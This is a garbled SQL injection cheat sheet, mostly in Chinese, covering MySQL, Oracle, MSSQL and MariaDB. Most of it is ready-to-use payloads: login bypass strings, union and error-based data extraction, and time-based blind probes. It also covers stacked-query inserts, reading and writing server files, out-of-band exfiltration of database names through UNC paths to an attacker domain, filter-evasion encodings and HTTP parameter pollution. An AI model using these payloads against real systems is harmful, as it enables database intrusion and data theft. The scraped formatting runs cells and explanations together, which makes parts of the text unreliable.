#1 利用系統特有變數去測試是否觸發 error
#2 用註解辨別
#
UNICODE(SQUARE(NULL)) IS NULL
@@ROWCOUNT
MySQL | Oracle | MSSQL | |
---|---|---|---|
注释符 | /* 、/*!*/ 、/**/ 、# 、/*!${[0-9]{5}} ${command}*/ 、-- |
-- 、/**/ |
-- 、/**/ 、`–%0a- |
空白字符 | %09%0A%0B%0C%0D%20 | %00%09%0A%0B%0C%0D%20 | %00-%20 |
mysql
/*!${[0-9]{5}} ${command}*/
版本大於${[0-9]{5}} 執行 ${command}--
– 後需要有至少一空白或控制字元#
Oracle
MSSQL/Transact-SQL
/etc/mysql/my.cnf
/var/lib/mysql
show databases;
use $database;
show tables [from $database];
show columns from [$database.]$table;
show grants [for $user@$host];
show global variables;
create database $database;
drop database $database;
create table $table ($column1 $type, ...) [from $database];
drop table $table [from $database];
insert into $table($column1, $column2...) values($value1, $value2...);
select $column1,$column2... from [$database.]$table;
update $table [from $database] set $column1=$value1,... [condition];
delete from [$database.]$table [condition];
user();
database();
select schema_name from information_schema.schemata;
version();
@@datadir;
select table_name from information_schema.tables where table_schema=database();
select column_name from information_schema.columns where table_schema=$database and table_name=$table
select name from users where id=1;
select name from users limit $start,$count;
select (select id from users limit 0,1)id,name as ji from users limit 0,3;
select name from users where id regexp '^ji..$';
if(expression, true:,false:);
select * from users where id='$id';
' or '1'='1;
=> select * from users where id='' or '1'='1';
select * from users where id=('$id');
') or '1'=('1;
=> select * from users where id='' or '1'=('1');
select database()
union select user(),version(),database();
to_char(1/0)
1/0
cast(1/0 as text)
SELECT IF (${COND}, (SELECT 1,2), 'a')
(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
extractvalue(1,concat("]",(select user())));
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
select *
取值出錯updatexml(1,concat("]",(select user())),1);
exp(~(select * from(select user())a));
if(expression, true: a,false: b);
version() regexp '^10.3';
= trueleft(version(),3);
= '10.3'mid(version(),2,5);
= '0.3.1'right(version(),5);
= 'aDB-1';ascii('a');
= '97'db | command |
---|---|
Oracle | dbms_pipe.receive_message(('a'),10) |
MS | WAITFOR DELAY '0:0:10' |
PostgreSQL | pg_sleep(10) |
MySQL | sleep(10) |
1'='1' and (boolean expression) and sleep(1);
1'='1' and (boolean expression) and benchmark(10000000,sha(1));
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select get_lock('karma',1);
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
;
串接複數查詢語句mysql_multi_query
; insert into users(id, name) values(7122,'jizz');;
檢測當前權限
select @@GLOBAL.secure_file_priv
show grants
: current user, 查看自身權限時不需要其他權限select * from information_schema.user_privileges
: global
所有資料庫設定: select * from information_schema.global_variables[where variable_name=$varName and variable_value=$varValue];
資料庫可不可寫: select @@secure_file_priv;
, show variables
所有權限欄位名: select column_name from information_schema.columns where table_schema='mysql' and table_name='user';
讀寫權限: select File_priv from mysql.user where concat(user,'@',host)=user();
host, user, password, (select|insert|update|delete|create|drop|file)_priv
into
受 secure_file_priv
限制: select ... into outfile $absPath [terminated by ...];
dumpfile
: no formattingoutfile
: formatting@var_list
: 存到 variable,@@datadir
secure_file_priv
限制secure_file_priv
限制load_file()
:select 1,2,load_file($absPath);
load data infile
: select load data infile $absPath .....
MariaDB 沒有 NULL 這個配置,所以預設可寫任何位置… ref
load_file(concat('\\',(select database()),$domain)
/*!{cmd}*/
select 'a' 'b' 'c';
空白 <space>
select/**/*/**/from/**/users;
and(1=0)
逗號 ,
select * from (select user())a join (select version())b join (select database())c;
limit a,b == limit b offset a
mid(c, a, b) == mid(c from a for b) == substr(c from a for b) == right(left(c, a+b-1),b)
having
, where
select * from user where name='cjiso';
select * from user having name='cjiso';
substr
< insert
select substr('abcde',1,3),insert('abcde',4,2,'');
in
> =
select * from user where 'cjiso'in(username);
select * from user where 'cjiso'=username;
sleep
> if
select sleep((1=1*)3);
select if(1=1,sleep(3),Null)
select
TABLE
, VALUES
..... where (table user limit 1) > row(1,1,1,1,1,1.....)
編碼
abcd
0b01100001011000100110001101100100
;B'01100001011000100110001101100100'
;b'01100001011000100110001101100100'
0x61626364
;X'61626364'
;x'61626364'
select _latin1'abcd',_utf8'àbcd',n'àbcd',N'àbcd';
U&"\0441\043B\043E\043D"
%df
可以吃掉 \
,繞過php的轉意(' => \'
)HTTP Parameter Pollution
原理: 解析重複參數順序不一致
條件: 存在解析重複參數順序不一致
情境:
參考:
Tomcat -> Apache: Tomcat 解析第一個,Apache解析最後一個
?id=1&id=payload
參考表格:
Web服務器 | 獲取函數 | 取到的參數 |
---|---|---|
PHP/Apache | $_GET("p") | Last |
JSP/Tomcat | Request.getParameter(“p”) | First |
Perl(CGI)/Apache | Param(“p”) | First |
Python/Apache | getvalue("p") | All(List) |
ASP/IIS | Request.QueryString(“p”) | All (comma-delimited string) |
select 1 order by 1 union select 2;
errorselect 1 limit 0,1 union select 2;
errorprocedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1);
secure_file_priv 預設會是空值,並且沒有 NULL
可以配置
MariaDB-only executable comment syntax (starting from MariaDB 5.3.1): /*M!###### MariaDB-specific code */
SELECT(1)FROM"sys"."tables"
: 無空格SCHEMA_NAME
: schema id to schema namename
: table nameschema_id
object_id
name
: column nameobject_id
: object id of the belonged bywebdav UNC
\\server[@SSL][@port][\path]
PROPFIND
https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/
https://learn.microsoft.com/en-us/windows/win32/api/davclnt/nf-davclnt-davgethttpfromuncpath
https://dl.packetstormsecurity.net/papers/general/MySQL_OOB_Hacking.pdf